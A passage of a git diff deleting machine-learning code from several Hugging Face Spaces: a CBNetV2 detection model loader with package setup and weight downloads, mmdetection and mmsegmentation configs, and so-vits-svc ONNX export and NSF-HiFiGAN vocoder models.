mim.uninstall('mmcv-full', confirm_yes=True) - mim.install('mmcv-full==1.5.0', is_yes=True) - - subprocess.run(shlex.split('pip uninstall -y opencv-python')) - subprocess.run(shlex.split('pip uninstall -y opencv-python-headless')) - subprocess.run(shlex.split('pip install opencv-python-headless==4.8.0.74')) - - with open('patch') as f: - subprocess.run(shlex.split('patch -p1'), cwd='CBNetV2', stdin=f) - subprocess.run('mv palette.py CBNetV2/mmdet/core/visualization/'.split()) - -import numpy as np -import torch -import torch.nn as nn - -app_dir = pathlib.Path(__file__).parent -submodule_dir = app_dir / 'CBNetV2/' -sys.path.insert(0, submodule_dir.as_posix()) - -from mmdet.apis import inference_detector, init_detector - - -class Model: - def __init__(self): - self.device = torch.device( - 'cuda:0' if torch.cuda.is_available() else 'cpu') - self.models = self._load_models() - self.model_name = 'Improved HTC (DB-Swin-B)' - - def _load_models(self) -> dict[str, nn.Module]: - model_dict = { - 'Faster R-CNN (DB-ResNet50)': { - 'config': - 'CBNetV2/configs/cbnet/faster_rcnn_cbv2d1_r50_fpn_1x_coco.py', - 'model': - 'https://github.com/CBNetwork/storage/releases/download/v1.0.0/faster_rcnn_cbv2d1_r50_fpn_1x_coco.pth.zip', - }, - 'Mask R-CNN (DB-Swin-T)': { - 'config': - 'CBNetV2/configs/cbnet/mask_rcnn_cbv2_swin_tiny_patch4_window7_mstrain_480-800_adamw_3x_coco.py', - 'model': - 'https://github.com/CBNetwork/storage/releases/download/v1.0.0/mask_rcnn_cbv2_swin_tiny_patch4_window7_mstrain_480-800_adamw_3x_coco.pth.zip', - }, - # 'Cascade Mask R-CNN (DB-Swin-S)': { - # 'config': - # 'CBNetV2/configs/cbnet/cascade_mask_rcnn_cbv2_swin_small_patch4_window7_mstrain_400-1400_adamw_3x_coco.py', - # 'model': - # 'https://github.com/CBNetwork/storage/releases/download/v1.0.0/cascade_mask_rcnn_cbv2_swin_small_patch4_window7_mstrain_400-1400_adamw_3x_coco.pth.zip', - # }, - 'Improved HTC (DB-Swin-B)': { - 'config': - 
'CBNetV2/configs/cbnet/htc_cbv2_swin_base_patch4_window7_mstrain_400-1400_giou_4conv1f_adamw_20e_coco.py', - 'model': - 'https://github.com/CBNetwork/storage/releases/download/v1.0.0/htc_cbv2_swin_base22k_patch4_window7_mstrain_400-1400_giou_4conv1f_adamw_20e_coco.pth.zip', - }, - 'Improved HTC (DB-Swin-L)': { - 'config': - 'CBNetV2/configs/cbnet/htc_cbv2_swin_large_patch4_window7_mstrain_400-1400_giou_4conv1f_adamw_1x_coco.py', - 'model': - 'https://github.com/CBNetwork/storage/releases/download/v1.0.0/htc_cbv2_swin_large22k_patch4_window7_mstrain_400-1400_giou_4conv1f_adamw_1x_coco.pth.zip', - }, - 'Improved HTC (DB-Swin-L (TTA))': { - 'config': - 'CBNetV2/configs/cbnet/htc_cbv2_swin_large_patch4_window7_mstrain_400-1400_giou_4conv1f_adamw_1x_coco.py', - 'model': - 'https://github.com/CBNetwork/storage/releases/download/v1.0.0/htc_cbv2_swin_large22k_patch4_window7_mstrain_400-1400_giou_4conv1f_adamw_1x_coco.pth.zip', - }, - } - - weight_dir = pathlib.Path('weights') - weight_dir.mkdir(exist_ok=True) - - def _download(model_name: str, out_dir: pathlib.Path) -> None: - import zipfile - - model_url = model_dict[model_name]['model'] - zip_name = model_url.split('/')[-1] - - out_path = out_dir / zip_name - if out_path.exists(): - return - torch.hub.download_url_to_file(model_url, out_path) - - with zipfile.ZipFile(out_path) as f: - f.extractall(out_dir) - - def _get_model_path(model_name: str) -> str: - model_url = model_dict[model_name]['model'] - model_name = model_url.split('/')[-1][:-4] - return (weight_dir / model_name).as_posix() - - for model_name in model_dict: - _download(model_name, weight_dir) - - models = { - key: init_detector(dic['config'], - _get_model_path(key), - device=self.device) - for key, dic in model_dict.items() - } - return models - - def set_model_name(self, name: str) -> None: - self.model_name = name - - def detect_and_visualize( - self, image: np.ndarray, - score_threshold: float) -> tuple[list[np.ndarray], np.ndarray]: - out = 
self.detect(image) - vis = self.visualize_detection_results(image, out, score_threshold) - return out, vis - - def detect(self, image: np.ndarray) -> list[np.ndarray]: - image = image[:, :, ::-1] # RGB -> BGR - model = self.models[self.model_name] - out = inference_detector(model, image) - return out - - def visualize_detection_results( - self, - image: np.ndarray, - detection_results: list[np.ndarray], - score_threshold: float = 0.3) -> np.ndarray: - image = image[:, :, ::-1] # RGB -> BGR - model = self.models[self.model_name] - vis = model.show_result(image, - detection_results, - score_thr=score_threshold, - bbox_color=None, - text_color=(200, 200, 200), - mask_color=None) - return vis[:, :, ::-1] # BGR -> RGB diff --git a/spaces/Gradio-Blocks/uniformer_image_detection/configs/cascade_rcnn/cascade_mask_rcnn_x101_32x4d_fpn_20e_coco.py b/spaces/Gradio-Blocks/uniformer_image_detection/configs/cascade_rcnn/cascade_mask_rcnn_x101_32x4d_fpn_20e_coco.py deleted file mode 100644 index 0cfc7d78a79836ed06cf242f5f5c32af7f065249..0000000000000000000000000000000000000000 --- a/spaces/Gradio-Blocks/uniformer_image_detection/configs/cascade_rcnn/cascade_mask_rcnn_x101_32x4d_fpn_20e_coco.py +++ /dev/null @@ -1,13 +0,0 @@ -_base_ = './cascade_mask_rcnn_r50_fpn_20e_coco.py' -model = dict( - pretrained='open-mmlab://resnext101_32x4d', - backbone=dict( - type='ResNeXt', - depth=101, - groups=32, - base_width=4, - num_stages=4, - out_indices=(0, 1, 2, 3), - frozen_stages=1, - norm_cfg=dict(type='BN', requires_grad=True), - style='pytorch')) diff --git a/spaces/Gradio-Blocks/uniformer_image_segmentation/configs/psanet/psanet_r50-d8_512x512_160k_ade20k.py b/spaces/Gradio-Blocks/uniformer_image_segmentation/configs/psanet/psanet_r50-d8_512x512_160k_ade20k.py deleted file mode 100644 index 9c6364eb43e2abc95011205b569627ff9367d0e5..0000000000000000000000000000000000000000 --- a/spaces/Gradio-Blocks/uniformer_image_segmentation/configs/psanet/psanet_r50-d8_512x512_160k_ade20k.py +++ 
/dev/null @@ -1,7 +0,0 @@ -_base_ = [ - '../_base_/models/psanet_r50-d8.py', '../_base_/datasets/ade20k.py', - '../_base_/default_runtime.py', '../_base_/schedules/schedule_160k.py' -] -model = dict( - decode_head=dict(mask_size=(66, 66), num_classes=150), - auxiliary_head=dict(num_classes=150)) diff --git a/spaces/GroveStreet/GTA_SOVITS/onnxexport/model_onnx.py b/spaces/GroveStreet/GTA_SOVITS/onnxexport/model_onnx.py deleted file mode 100644 index e28bae95ec1e53aa05d06fc784ff86d55f228d60..0000000000000000000000000000000000000000 --- a/spaces/GroveStreet/GTA_SOVITS/onnxexport/model_onnx.py +++ /dev/null @@ -1,335 +0,0 @@ -import torch -from torch import nn -from torch.nn import functional as F - -import modules.attentions as attentions -import modules.commons as commons -import modules.modules as modules - -from torch.nn import Conv1d, ConvTranspose1d, AvgPool1d, Conv2d -from torch.nn.utils import weight_norm, remove_weight_norm, spectral_norm - -import utils -from modules.commons import init_weights, get_padding -from vdecoder.hifigan.models import Generator -from utils import f0_to_coarse - - -class ResidualCouplingBlock(nn.Module): - def __init__(self, - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - n_flows=4, - gin_channels=0): - super().__init__() - self.channels = channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.n_flows = n_flows - self.gin_channels = gin_channels - - self.flows = nn.ModuleList() - for i in range(n_flows): - self.flows.append( - modules.ResidualCouplingLayer(channels, hidden_channels, kernel_size, dilation_rate, n_layers, - gin_channels=gin_channels, mean_only=True)) - self.flows.append(modules.Flip()) - - def forward(self, x, x_mask, g=None, reverse=False): - if not reverse: - for flow in self.flows: - x, _ = flow(x, x_mask, g=g, reverse=reverse) - else: - for flow in reversed(self.flows): - x = flow(x, 
x_mask, g=g, reverse=reverse) - return x - - -class Encoder(nn.Module): - def __init__(self, - in_channels, - out_channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=0): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - - self.pre = nn.Conv1d(in_channels, hidden_channels, 1) - self.enc = modules.WN(hidden_channels, kernel_size, dilation_rate, n_layers, gin_channels=gin_channels) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, x, x_lengths, g=None): - # print(x.shape,x_lengths.shape) - x_mask = torch.unsqueeze(commons.sequence_mask(x_lengths, x.size(2)), 1).to(x.dtype) - x = self.pre(x) * x_mask - x = self.enc(x, x_mask, g=g) - stats = self.proj(x) * x_mask - m, logs = torch.split(stats, self.out_channels, dim=1) - z = (m + torch.randn_like(m) * torch.exp(logs)) * x_mask - return z, m, logs, x_mask - - -class TextEncoder(nn.Module): - def __init__(self, - out_channels, - hidden_channels, - kernel_size, - n_layers, - gin_channels=0, - filter_channels=None, - n_heads=None, - p_dropout=None): - super().__init__() - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.n_layers = n_layers - self.gin_channels = gin_channels - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - self.f0_emb = nn.Embedding(256, hidden_channels) - - self.enc_ = attentions.Encoder( - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout) - - def forward(self, x, x_mask, f0=None, z=None): - x = x + self.f0_emb(f0).transpose(1, 2) - x = self.enc_(x * x_mask, x_mask) - stats = self.proj(x) * x_mask - m, logs = torch.split(stats, self.out_channels, dim=1) - z = (m + z * torch.exp(logs)) * x_mask - return z, m, logs, 
x_mask - - -class DiscriminatorP(torch.nn.Module): - def __init__(self, period, kernel_size=5, stride=3, use_spectral_norm=False): - super(DiscriminatorP, self).__init__() - self.period = period - self.use_spectral_norm = use_spectral_norm - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList([ - norm_f(Conv2d(1, 32, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(32, 128, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(128, 512, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(512, 1024, (kernel_size, 1), (stride, 1), padding=(get_padding(kernel_size, 1), 0))), - norm_f(Conv2d(1024, 1024, (kernel_size, 1), 1, padding=(get_padding(kernel_size, 1), 0))), - ]) - self.conv_post = norm_f(Conv2d(1024, 1, (3, 1), 1, padding=(1, 0))) - - def forward(self, x): - fmap = [] - - # 1d to 2d - b, c, t = x.shape - if t % self.period != 0: # pad first - n_pad = self.period - (t % self.period) - x = F.pad(x, (0, n_pad), "reflect") - t = t + n_pad - x = x.view(b, c, t // self.period, self.period) - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class DiscriminatorS(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(DiscriminatorS, self).__init__() - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList([ - norm_f(Conv1d(1, 16, 15, 1, padding=7)), - norm_f(Conv1d(16, 64, 41, 4, groups=4, padding=20)), - norm_f(Conv1d(64, 256, 41, 4, groups=16, padding=20)), - norm_f(Conv1d(256, 1024, 41, 4, groups=64, padding=20)), - norm_f(Conv1d(1024, 1024, 41, 4, groups=256, padding=20)), - norm_f(Conv1d(1024, 1024, 5, 1, padding=2)), - ]) - self.conv_post = norm_f(Conv1d(1024, 1, 3, 1, padding=1)) - - def forward(self, 
x): - fmap = [] - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, modules.LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class F0Decoder(nn.Module): - def __init__(self, - out_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - spk_channels=0): - super().__init__() - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.spk_channels = spk_channels - - self.prenet = nn.Conv1d(hidden_channels, hidden_channels, 3, padding=1) - self.decoder = attentions.FFT( - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout) - self.proj = nn.Conv1d(hidden_channels, out_channels, 1) - self.f0_prenet = nn.Conv1d(1, hidden_channels, 3, padding=1) - self.cond = nn.Conv1d(spk_channels, hidden_channels, 1) - - def forward(self, x, norm_f0, x_mask, spk_emb=None): - x = torch.detach(x) - if spk_emb is not None: - x = x + self.cond(spk_emb) - x += self.f0_prenet(norm_f0) - x = self.prenet(x) * x_mask - x = self.decoder(x * x_mask, x_mask) - x = self.proj(x) * x_mask - return x - - -class SynthesizerTrn(nn.Module): - """ - Synthesizer for Training - """ - - def __init__(self, - spec_channels, - segment_size, - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels, - ssl_dim, - n_speakers, - sampling_rate=44100, - **kwargs): - super().__init__() - self.spec_channels = spec_channels - self.inter_channels = inter_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers 
- self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.resblock = resblock - self.resblock_kernel_sizes = resblock_kernel_sizes - self.resblock_dilation_sizes = resblock_dilation_sizes - self.upsample_rates = upsample_rates - self.upsample_initial_channel = upsample_initial_channel - self.upsample_kernel_sizes = upsample_kernel_sizes - self.segment_size = segment_size - self.gin_channels = gin_channels - self.ssl_dim = ssl_dim - self.emb_g = nn.Embedding(n_speakers, gin_channels) - - self.pre = nn.Conv1d(ssl_dim, hidden_channels, kernel_size=5, padding=2) - - self.enc_p = TextEncoder( - inter_channels, - hidden_channels, - filter_channels=filter_channels, - n_heads=n_heads, - n_layers=n_layers, - kernel_size=kernel_size, - p_dropout=p_dropout - ) - hps = { - "sampling_rate": sampling_rate, - "inter_channels": inter_channels, - "resblock": resblock, - "resblock_kernel_sizes": resblock_kernel_sizes, - "resblock_dilation_sizes": resblock_dilation_sizes, - "upsample_rates": upsample_rates, - "upsample_initial_channel": upsample_initial_channel, - "upsample_kernel_sizes": upsample_kernel_sizes, - "gin_channels": gin_channels, - } - self.dec = Generator(h=hps) - self.enc_q = Encoder(spec_channels, inter_channels, hidden_channels, 5, 1, 16, gin_channels=gin_channels) - self.flow = ResidualCouplingBlock(inter_channels, hidden_channels, 5, 1, 4, gin_channels=gin_channels) - self.f0_decoder = F0Decoder( - 1, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - spk_channels=gin_channels - ) - self.emb_uv = nn.Embedding(2, hidden_channels) - self.predict_f0 = False - - def forward(self, c, f0, mel2ph, uv, noise=None, g=None): - - decoder_inp = F.pad(c, [0, 0, 1, 0]) - mel2ph_ = mel2ph.unsqueeze(2).repeat([1, 1, c.shape[-1]]) - c = torch.gather(decoder_inp, 1, mel2ph_).transpose(1, 2) # [B, T, H] - - c_lengths = (torch.ones(c.size(0)) * c.size(-1)).to(c.device) - g = g.unsqueeze(0) - g = self.emb_g(g).transpose(1, 2) - x_mask 
= torch.unsqueeze(commons.sequence_mask(c_lengths, c.size(2)), 1).to(c.dtype) - x = self.pre(c) * x_mask + self.emb_uv(uv.long()).transpose(1, 2) - - if self.predict_f0: - lf0 = 2595. * torch.log10(1. + f0.unsqueeze(1) / 700.) / 500 - norm_lf0 = utils.normalize_f0(lf0, x_mask, uv, random_scale=False) - pred_lf0 = self.f0_decoder(x, norm_lf0, x_mask, spk_emb=g) - f0 = (700 * (torch.pow(10, pred_lf0 * 500 / 2595) - 1)).squeeze(1) - - z_p, m_p, logs_p, c_mask = self.enc_p(x, x_mask, f0=f0_to_coarse(f0), z=noise) - z = self.flow(z_p, c_mask, g=g, reverse=True) - o = self.dec(z * c_mask, g=g, f0=f0) - return o diff --git a/spaces/GroveStreet/GTA_SOVITS/vdecoder/nsf_hifigan/models.py b/spaces/GroveStreet/GTA_SOVITS/vdecoder/nsf_hifigan/models.py deleted file mode 100644 index c2c889ec2fbd215702298ba2b7c411c6f5630d80..0000000000000000000000000000000000000000 --- a/spaces/GroveStreet/GTA_SOVITS/vdecoder/nsf_hifigan/models.py +++ /dev/null @@ -1,439 +0,0 @@ -import os -import json -from .env import AttrDict -import numpy as np -import torch -import torch.nn.functional as F -import torch.nn as nn -from torch.nn import Conv1d, ConvTranspose1d, AvgPool1d, Conv2d -from torch.nn.utils import weight_norm, remove_weight_norm, spectral_norm -from .utils import init_weights, get_padding - -LRELU_SLOPE = 0.1 - - -def load_model(model_path, device='cuda'): - h = load_config(model_path) - - generator = Generator(h).to(device) - - cp_dict = torch.load(model_path, map_location=device) - generator.load_state_dict(cp_dict['generator']) - generator.eval() - generator.remove_weight_norm() - del cp_dict - return generator, h - -def load_config(model_path): - config_file = os.path.join(os.path.split(model_path)[0], 'config.json') - with open(config_file) as f: - data = f.read() - - json_config = json.loads(data) - h = AttrDict(json_config) - return h - - -class ResBlock1(torch.nn.Module): - def __init__(self, h, channels, kernel_size=3, dilation=(1, 3, 5)): - super(ResBlock1, self).__init__() 
- self.h = h - self.convs1 = nn.ModuleList([ - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[0], - padding=get_padding(kernel_size, dilation[0]))), - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[1], - padding=get_padding(kernel_size, dilation[1]))), - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[2], - padding=get_padding(kernel_size, dilation[2]))) - ]) - self.convs1.apply(init_weights) - - self.convs2 = nn.ModuleList([ - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=1, - padding=get_padding(kernel_size, 1))), - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=1, - padding=get_padding(kernel_size, 1))), - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=1, - padding=get_padding(kernel_size, 1))) - ]) - self.convs2.apply(init_weights) - - def forward(self, x): - for c1, c2 in zip(self.convs1, self.convs2): - xt = F.leaky_relu(x, LRELU_SLOPE) - xt = c1(xt) - xt = F.leaky_relu(xt, LRELU_SLOPE) - xt = c2(xt) - x = xt + x - return x - - def remove_weight_norm(self): - for l in self.convs1: - remove_weight_norm(l) - for l in self.convs2: - remove_weight_norm(l) - - -class ResBlock2(torch.nn.Module): - def __init__(self, h, channels, kernel_size=3, dilation=(1, 3)): - super(ResBlock2, self).__init__() - self.h = h - self.convs = nn.ModuleList([ - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[0], - padding=get_padding(kernel_size, dilation[0]))), - weight_norm(Conv1d(channels, channels, kernel_size, 1, dilation=dilation[1], - padding=get_padding(kernel_size, dilation[1]))) - ]) - self.convs.apply(init_weights) - - def forward(self, x): - for c in self.convs: - xt = F.leaky_relu(x, LRELU_SLOPE) - xt = c(xt) - x = xt + x - return x - - def remove_weight_norm(self): - for l in self.convs: - remove_weight_norm(l) - - -class SineGen(torch.nn.Module): - """ Definition of sine generator - SineGen(samp_rate, harmonic_num = 0, 
- sine_amp = 0.1, noise_std = 0.003, - voiced_threshold = 0, - flag_for_pulse=False) - samp_rate: sampling rate in Hz - harmonic_num: number of harmonic overtones (default 0) - sine_amp: amplitude of sine-waveform (default 0.1) - noise_std: std of Gaussian noise (default 0.003) - voiced_threshold: F0 threshold for U/V classification (default 0) - flag_for_pulse: this SineGen is used inside PulseGen (default False) - Note: when flag_for_pulse is True, the first time step of a voiced - segment is always sin(np.pi) or cos(0) - """ - - def __init__(self, samp_rate, harmonic_num=0, - sine_amp=0.1, noise_std=0.003, - voiced_threshold=0): - super(SineGen, self).__init__() - self.sine_amp = sine_amp - self.noise_std = noise_std - self.harmonic_num = harmonic_num - self.dim = self.harmonic_num + 1 - self.sampling_rate = samp_rate - self.voiced_threshold = voiced_threshold - - def _f02uv(self, f0): - # generate uv signal - uv = torch.ones_like(f0) - uv = uv * (f0 > self.voiced_threshold) - return uv - - @torch.no_grad() - def forward(self, f0, upp): - """ sine_tensor, uv = forward(f0) - input F0: tensor(batchsize=1, length, dim=1) - f0 for unvoiced steps should be 0 - output sine_tensor: tensor(batchsize=1, length, dim) - output uv: tensor(batchsize=1, length, 1) - """ - f0 = f0.unsqueeze(-1) - fn = torch.multiply(f0, torch.arange(1, self.dim + 1, device=f0.device).reshape((1, 1, -1))) - rad_values = (fn / self.sampling_rate) % 1 ### taking % 1 here means the n_har products cannot be optimized in post-processing - rand_ini = torch.rand(fn.shape[0], fn.shape[2], device=fn.device) - rand_ini[:, 0] = 0 - rad_values[:, 0, :] = rad_values[:, 0, :] + rand_ini - is_half = rad_values.dtype is not torch.float32 - tmp_over_one = torch.cumsum(rad_values.double(), 1) # % 1 ##### taking % 1 here would keep the following cumsum from being optimized - if is_half: - tmp_over_one = tmp_over_one.half() - else: - tmp_over_one = tmp_over_one.float() - tmp_over_one *= upp - tmp_over_one = F.interpolate( - tmp_over_one.transpose(2, 1), scale_factor=upp, - mode='linear', align_corners=True - 
).transpose(2, 1) - rad_values = F.interpolate(rad_values.transpose(2, 1), scale_factor=upp, mode='nearest').transpose(2, 1) - tmp_over_one %= 1 - tmp_over_one_idx = (tmp_over_one[:, 1:, :] - tmp_over_one[:, :-1, :]) < 0 - cumsum_shift = torch.zeros_like(rad_values) - cumsum_shift[:, 1:, :] = tmp_over_one_idx * -1.0 - rad_values = rad_values.double() - cumsum_shift = cumsum_shift.double() - sine_waves = torch.sin(torch.cumsum(rad_values + cumsum_shift, dim=1) * 2 * np.pi) - if is_half: - sine_waves = sine_waves.half() - else: - sine_waves = sine_waves.float() - sine_waves = sine_waves * self.sine_amp - uv = self._f02uv(f0) - uv = F.interpolate(uv.transpose(2, 1), scale_factor=upp, mode='nearest').transpose(2, 1) - noise_amp = uv * self.noise_std + (1 - uv) * self.sine_amp / 3 - noise = noise_amp * torch.randn_like(sine_waves) - sine_waves = sine_waves * uv + noise - return sine_waves, uv, noise - - -class SourceModuleHnNSF(torch.nn.Module): - """ SourceModule for hn-nsf - SourceModule(sampling_rate, harmonic_num=0, sine_amp=0.1, - add_noise_std=0.003, voiced_threshod=0) - sampling_rate: sampling_rate in Hz - harmonic_num: number of harmonics above F0 (default: 0) - sine_amp: amplitude of sine source signal (default: 0.1) - add_noise_std: std of additive Gaussian noise (default: 0.003) - note that amplitude of noise in unvoiced is decided - by sine_amp - voiced_threshold: threshold to set U/V given F0 (default: 0) - Sine_source, noise_source = SourceModuleHnNSF(F0_sampled) - F0_sampled (batchsize, length, 1) - Sine_source (batchsize, length, 1) - noise_source (batchsize, length, 1) - uv (batchsize, length, 1) - """ - - def __init__(self, sampling_rate, harmonic_num=0, sine_amp=0.1, - add_noise_std=0.003, voiced_threshod=0): - super(SourceModuleHnNSF, self).__init__() - - self.sine_amp = sine_amp - self.noise_std = add_noise_std - - # to produce sine waveforms - self.l_sin_gen = SineGen(sampling_rate, harmonic_num, - sine_amp, add_noise_std, voiced_threshod) - - # to 
merge source harmonics into a single excitation - self.l_linear = torch.nn.Linear(harmonic_num + 1, 1) - self.l_tanh = torch.nn.Tanh() - - def forward(self, x, upp): - sine_wavs, uv, _ = self.l_sin_gen(x, upp) - sine_merge = self.l_tanh(self.l_linear(sine_wavs)) - return sine_merge - - -class Generator(torch.nn.Module): - def __init__(self, h): - super(Generator, self).__init__() - self.h = h - self.num_kernels = len(h.resblock_kernel_sizes) - self.num_upsamples = len(h.upsample_rates) - self.m_source = SourceModuleHnNSF( - sampling_rate=h.sampling_rate, - harmonic_num=8 - ) - self.noise_convs = nn.ModuleList() - self.conv_pre = weight_norm(Conv1d(h.num_mels, h.upsample_initial_channel, 7, 1, padding=3)) - resblock = ResBlock1 if h.resblock == '1' else ResBlock2 - - self.ups = nn.ModuleList() - for i, (u, k) in enumerate(zip(h.upsample_rates, h.upsample_kernel_sizes)): - c_cur = h.upsample_initial_channel // (2 ** (i + 1)) - self.ups.append(weight_norm( - ConvTranspose1d(h.upsample_initial_channel // (2 ** i), h.upsample_initial_channel // (2 ** (i + 1)), - k, u, padding=(k - u) // 2))) - if i + 1 < len(h.upsample_rates): # - stride_f0 = int(np.prod(h.upsample_rates[i + 1:])) - self.noise_convs.append(Conv1d( - 1, c_cur, kernel_size=stride_f0 * 2, stride=stride_f0, padding=stride_f0 // 2)) - else: - self.noise_convs.append(Conv1d(1, c_cur, kernel_size=1)) - self.resblocks = nn.ModuleList() - ch = h.upsample_initial_channel - for i in range(len(self.ups)): - ch //= 2 - for j, (k, d) in enumerate(zip(h.resblock_kernel_sizes, h.resblock_dilation_sizes)): - self.resblocks.append(resblock(h, ch, k, d)) - - self.conv_post = weight_norm(Conv1d(ch, 1, 7, 1, padding=3)) - self.ups.apply(init_weights) - self.conv_post.apply(init_weights) - self.upp = int(np.prod(h.upsample_rates)) - - def forward(self, x, f0): - har_source = self.m_source(f0, self.upp).transpose(1, 2) - x = self.conv_pre(x) - for i in range(self.num_upsamples): - x = F.leaky_relu(x, LRELU_SLOPE) - x = 
self.ups[i](x) - x_source = self.noise_convs[i](har_source) - x = x + x_source - xs = None - for j in range(self.num_kernels): - if xs is None: - xs = self.resblocks[i * self.num_kernels + j](x) - else: - xs += self.resblocks[i * self.num_kernels + j](x) - x = xs / self.num_kernels - x = F.leaky_relu(x) - x = self.conv_post(x) - x = torch.tanh(x) - - return x - - def remove_weight_norm(self): - print('Removing weight norm...') - for l in self.ups: - remove_weight_norm(l) - for l in self.resblocks: - l.remove_weight_norm() - remove_weight_norm(self.conv_pre) - remove_weight_norm(self.conv_post) - - -class DiscriminatorP(torch.nn.Module): - def __init__(self, period, kernel_size=5, stride=3, use_spectral_norm=False): - super(DiscriminatorP, self).__init__() - self.period = period - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList([ - norm_f(Conv2d(1, 32, (kernel_size, 1), (stride, 1), padding=(get_padding(5, 1), 0))), - norm_f(Conv2d(32, 128, (kernel_size, 1), (stride, 1), padding=(get_padding(5, 1), 0))), - norm_f(Conv2d(128, 512, (kernel_size, 1), (stride, 1), padding=(get_padding(5, 1), 0))), - norm_f(Conv2d(512, 1024, (kernel_size, 1), (stride, 1), padding=(get_padding(5, 1), 0))), - norm_f(Conv2d(1024, 1024, (kernel_size, 1), 1, padding=(2, 0))), - ]) - self.conv_post = norm_f(Conv2d(1024, 1, (3, 1), 1, padding=(1, 0))) - - def forward(self, x): - fmap = [] - - # 1d to 2d - b, c, t = x.shape - if t % self.period != 0: # pad first - n_pad = self.period - (t % self.period) - x = F.pad(x, (0, n_pad), "reflect") - t = t + n_pad - x = x.view(b, c, t // self.period, self.period) - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class MultiPeriodDiscriminator(torch.nn.Module): - def __init__(self, periods=None): - super(MultiPeriodDiscriminator, self).__init__() - self.periods = periods if 
periods is not None else [2, 3, 5, 7, 11] - self.discriminators = nn.ModuleList() - for period in self.periods: - self.discriminators.append(DiscriminatorP(period)) - - def forward(self, y, y_hat): - y_d_rs = [] - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - y_d_rs.append(y_d_r) - fmap_rs.append(fmap_r) - y_d_gs.append(y_d_g) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -class DiscriminatorS(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(DiscriminatorS, self).__init__() - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList([ - norm_f(Conv1d(1, 128, 15, 1, padding=7)), - norm_f(Conv1d(128, 128, 41, 2, groups=4, padding=20)), - norm_f(Conv1d(128, 256, 41, 2, groups=16, padding=20)), - norm_f(Conv1d(256, 512, 41, 4, groups=16, padding=20)), - norm_f(Conv1d(512, 1024, 41, 4, groups=16, padding=20)), - norm_f(Conv1d(1024, 1024, 41, 1, groups=16, padding=20)), - norm_f(Conv1d(1024, 1024, 5, 1, padding=2)), - ]) - self.conv_post = norm_f(Conv1d(1024, 1, 3, 1, padding=1)) - - def forward(self, x): - fmap = [] - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class MultiScaleDiscriminator(torch.nn.Module): - def __init__(self): - super(MultiScaleDiscriminator, self).__init__() - self.discriminators = nn.ModuleList([ - DiscriminatorS(use_spectral_norm=True), - DiscriminatorS(), - DiscriminatorS(), - ]) - self.meanpools = nn.ModuleList([ - AvgPool1d(4, 2, padding=2), - AvgPool1d(4, 2, padding=2) - ]) - - def forward(self, y, y_hat): - y_d_rs = [] - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - if i != 0: - y = self.meanpools[i - 1](y) - y_hat = self.meanpools[i - 1](y_hat) - y_d_r, fmap_r = d(y) - y_d_g, fmap_g 
